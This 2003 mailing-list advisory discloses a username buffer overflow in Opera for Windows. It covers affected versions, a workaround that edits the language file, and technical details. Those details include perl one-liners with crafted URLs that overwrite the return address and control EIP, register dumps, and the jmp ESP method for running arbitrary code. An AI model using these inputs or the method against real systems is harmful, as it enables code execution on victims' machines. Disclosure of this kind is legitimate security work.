Opera Username Buffer Overflow Vulnerability

From: nesumin (nesuminat_private)
Date: Sat Feb 08 2003 - 23:47:46 PST

  • Next message: Marc Schoenefeld: "Java-Applet crashes Opera 6.05 and 7.01"

    Hello all.
    We release the information about the vulnerability
    of Opera, here.
    And we wish that this vulnerability is fixed by Vendor,
     Synopsis:    Opera Username Buffer Overflow Vulnerability
     Product:     Opera for Windows
     Version:     6.05 build1140 (and Opera7 beta2 build2577)
     Vendor:      Opera Software ASA (http://www.opera.com/)
     Risk:        High. Execute arbitrary binary code
     Remote:      Yes
     Local:       Yes
     Discovered:  nesumin <nesuminat_private>
     Reported:    2003-02-02
     Published:   2003-02-09
    Product :
      Opera for windows is GUI base WEB Browser.
      It has Mail, News, IM client.
      Opera Software ASA
    OverView :
      Opera6.05 build 1140 (and Opera7 beta2 build 2577) for Windows
      has the critical vulnerability.
      When Opera will open the URL of HTTP that contains
      the "a long username", buffer overflow occurs on the stack.
      An attacker can cause it using link(anchor tag),
      picture(image tag), frame, script, etc.
      Then, it can overwrite saved RET address on stack,
      and it enables to execute the arbitrary binary code.
      If Opera user opens malicious URL,
      they may suffer damage, such as system destruction
      and virus infection, etc.
    Tested on :
        Opera6.05 build 1140
        Opera7 beta2 build 2577
        Opera7.00 build 2637
        Opera7.01 build 2651
        English edition and Japanese edition.
        Windows98SE JP
        Windows2000 SP3 JP
        WindowsXP SP1 JP
    Vulnerable in tested :
      Opera6.05 build 1140
      Opera7 beta2 build 2577
    Unvulnerable in tested :
      Opera7.00 build 2637
      Opera7.01 build 2651
    Vendor status :
      Already reported, 2003/02/02.
      But we don't know the correspondence and attitude of
      Opera Software ASA against this vulnerability
      because we didn't have the formal reply from Opera Software ASA.
    Solution :
      We propose the following temporary method until this vulnerability
      is fixed by vendor.
      It is the method of deleting two "%s" from the string of
      the resource number "21463" in the language file (*.lng).
      Thereby, User name and Server name is also no longer displayed
      in the URL warning dialog.
    Details :
      When Opera will open the URL of HTTP Protocol that contains
      an user name, it will use the format string of the resource
      number "21463" in a language file, and will generate the string
      for displaying on the "URL Warning Dialog".
      Then Overflow occurs by the Local Buffer on the Stack by
      specifying "long user name", because there is not length-check
      against the user name.
      (The length of the whole URL has restriction)
      The RET address can be overwritten by about 2624 characters
      (16bits), it depends on the string of "21463".
      [Opera6.05 build 1140, english language file]
      $ perl -e "exec('opera.exe', 'http://'. 'A' x 2624 .'@/')"
      Exception C0000005
      EAX=00410041   EBX=01B5F9BA   ECX=0012E254   EDX=01B60E58   ESI=01A8A940
      EDI=77DF6001   EBP=0012E278   ESP=0012CDD8   EIP=00423D68 FLAGS=00000216
      0012CDD8  00000110  00000001  005F2464  00200020  ........d$_. . .
      0012CDE8  00200020  00730055  00720065  0061006E   . .U.s.e.r.n.a.
      0012CDF8  0065006D  0020003A  00410041  00410041  m.e.:. .A.A.A.A.
      0012CE08  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
      0012E268  00410041  00410041  00410041  00410041  A.A.A.A.A.A.A.A.
      0012E278 >00410041  00410041  007D0020  007C031E  A.A.A.A. .....|.
      0012E288  01A8A940  007D02D0  0012E2D8  00000000  @.....}...E.....
      In the above case, Access violation occurs before EIP moves to
      the RET address. But EIP is movable by setting the fake values,
      0x80000001 or other values to the area which is referred to
      after overwritten.
      $ perl -e "exec('opera.exe', 'http://'.'%01%e8%80%80' x 1311 .'%ef%bb%be' x 2 .'@/')"
        "%01%e8%80%80" = 0x80000001, "%ef%bb%be%ef%bb%be" = 0xfefefefe
        (with "Encode all addresses with UTF-8" setting.)
      Exception C0000005
      EAX=00000001   EBX=005F2464   ECX=00010101   EDX=F03639D8    ESI=00000001
      EDI=00000110   EBP=80000001   ESP=0012E28C  *EIP=FEFEFEFE  FLAGS=00000202
      ESP register points to the position of the RET address's
      offsets value + about 0x10 bytes.
      Therefore, It is possible to execute the arbitrary binary code
      by overwriting the RET address in the address of the "jmp ESP"
      instruction, putting the binary code after the area
      which is pointed by ESP register.
      In Opera7.0 build 2637 or later, we could not confirm
      this vulnerability.
      The user name written in the buffer by this vulnerability
      is changed into 16bit wide characters.
      When the setting of "Encode all addresses with UTF-8" is
      enabled and the user name encoded by UTF or etc is specified,
      the exploit data easily can be set on the stack.
      And, If the setting of it is disabled,
      It becomes very difficult.
    Sample Code : (attached file)
      This program is the generator that creates Exploit HTML files.
      test compiled, Visual C++ 6.
      * This source code is only as sample checking vulnerability.
      * It is a user's responsibility whatever result is occurred
        by this code.
    Special thanks :
      :: Operash ::
      [ Unofficial Opera's Bug and Security information site for Japanese people ]
      imagine (Operash webmaster)
    Contacts, Etc :
      nesumin <nesuminat_private>
      This information does not assure the contents.
      We may correct the contents of this information to timely.
      We take no responsibility for any damage generated by using
      this information.
    nesumin <nesuminat_private>

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